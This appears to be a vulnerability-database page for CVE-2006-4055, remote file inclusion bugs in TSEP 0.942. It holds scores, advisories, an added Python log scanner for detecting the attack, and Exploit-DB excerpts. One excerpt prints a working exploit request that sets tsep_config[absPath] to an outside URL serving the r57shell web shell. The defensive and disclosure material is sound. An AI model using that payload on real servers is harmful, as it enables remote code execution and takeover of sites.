CVE-2006-4055
Published 2006-08-10
Priority: P3 · 40 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 3.83% (88.8th percentile)
Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to (1) include/colorswitch.php, (2) contentimages.class.php, (3) ipfunctions.php, (4) configfunctions.php, (5) printpagedetails.php, or (6) log.class.php. NOTE: the copyright.php vector is already covered by CVE-2006-3993.
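A defender can look for this vector in web server access logs. The sketch below is an added example, not part of the advisory or of TSEP: it flags requests to the six listed scripts whose tsep_config[absPath] query parameter carries a URL. The combined log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts named in the CVE-2006-4055 description, matched as path suffixes.
TSEP_SCRIPTS = (
    "/include/colorswitch.php", "/contentimages.class.php",
    "/ipfunctions.php", "/configfunctions.php",
    "/printpagedetails.php", "/log.class.php",
)
# Value that begins with a URL scheme (http://, ftp://, ...) or "//host".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|//)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def abs_path_values(target):
    """Return every decoded value supplied for tsep_config[absPath]."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    # parse_qsl percent-decodes, so tsep_config%5BabsPath%5D is caught too.
    return [v for k, v in pairs if k.strip() == "tsep_config[absPath]"]

def is_suspicious(line):
    """True when a listed TSEP script is sent a remote absPath value."""
    match = REQUEST.search(line)
    if not match:
        return False
    target = match.group(1)
    if not urlsplit(target).path.lower().endswith(TSEP_SCRIPTS):
        return False
    return any(REMOTE_VALUE.match(v) for v in abs_path_values(target))

def scan(lines):
    """Return the log lines that match the pattern."""
    return [line for line in lines if is_suspicious(line)]

# Constructed sample log lines (documentation addresses, example.invalid host).
SAMPLE_LINES = [
    '203.0.113.7 - - [02/Aug/2006:10:00:01 +0000] "GET /tsep/include/colorswitch.php?tsep_config[absPath]=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/Aug/2006:10:00:05 +0000] "GET /tsep/include/ipfunctions.php?tsep_config%5BabsPath%5D=ftp%3A%2F%2Fexample.invalid%2Fa HTTP/1.0" 200 88',
    '198.51.100.4 - - [02/Aug/2006:10:01:00 +0000] "GET /tsep/include/colorswitch.php?color=blue HTTP/1.1" 200 900',
    '198.51.100.4 - - [02/Aug/2006:10:02:00 +0000] "GET /tsep/search.php?q=http://example.org/ HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit)
```

Access logs record only the query string, so a value delivered in a POST body or cookie (which register_globals also imports) is not visible to this check.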
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| olaf_noehring | the_search_engine_project | <= 0.942 | — |
| tsep | tsep | <= 0.942 | — |
GHSA
GHSA-9xc9-cc34-mr9j: PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-4085 [HIGH] GHSA-9xc9-cc34-mr9j: PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0
PHP remote file inclusion vulnerability in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to pagenavigation.php, a different vector than CVE-2006-4055. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
GHSA
GHSA-4gw2-cpvx-xqjf: Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0
ghsa_unreviewed·2022-05-01·CVSS 5.1
CVE-2006-4055 [MEDIUM] GHSA-4gw2-cpvx-xqjf: Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0
Multiple PHP remote file inclusion vulnerabilities in Olaf Noehring The Search Engine Project (TSEP) 0.942 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the tsep_config[absPath] parameter to (1) include/colorswitch.php, (2) contentimages.class.php, (3) ipfunctions.php, (4) configfunctions.php, (5) printpagedetails.php, or (6) log.class.php. NOTE: the copyright.php vector is already covered by CVE-2006-3993.
No detection rules found.
Exploit-DB
TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
exploitdb·2006-08-02
CVE-2006-4055 TSEP 0.942 - 'colorswitch.php' Remote File Inclusion
---
Script: TSEP
Comments: "register_globals" must be enabled duh.
document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:
./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
./tsep.0942/include/printpagedetails.php => require_once( $tsep_config["absPath"]."/include/convert_htmlent.php" );
./tsep.0942/include/ipfunctions.php => require_once( $tsep_config["absPath"]."/include/IPv6.php" );
./tsep.0942/include/contentimages.class.php => require_once( $tsep_config["absPath"]."/include/contentimages.class.php" );
./tsep.0942/include/configfunctions.php => require_once( $tsep_config["absPath"]."/include/mmexfunctions.php" );
./tsep.0942/include/log.class.php => require_once
Exploit-DB
TSEP 0.942 - 'copyright.php' Remote File Inclusion
exploitdb·2006-08-01
CVE-2006-4085 TSEP 0.942 - 'copyright.php' Remote File Inclusion
---
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Vendor ............: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized befor
No writeups or analysis indexed.
http://secunia.com/advisories/21291
http://securityreason.com/securityalert/1354
http://sourceforge.net/forum/forum.php?forum_id=597790
http://sourceforge.net/forum/forum.php?thread_id=1546639&forum_id=369628
http://www.securityfocus.com/archive/1/442098/100/0/threaded
http://www.securityfocus.com/bid/19326
https://exchange.xforce.ibmcloud.com/vulnerabilities/28107
https://www.exploit-db.com/exploits/2116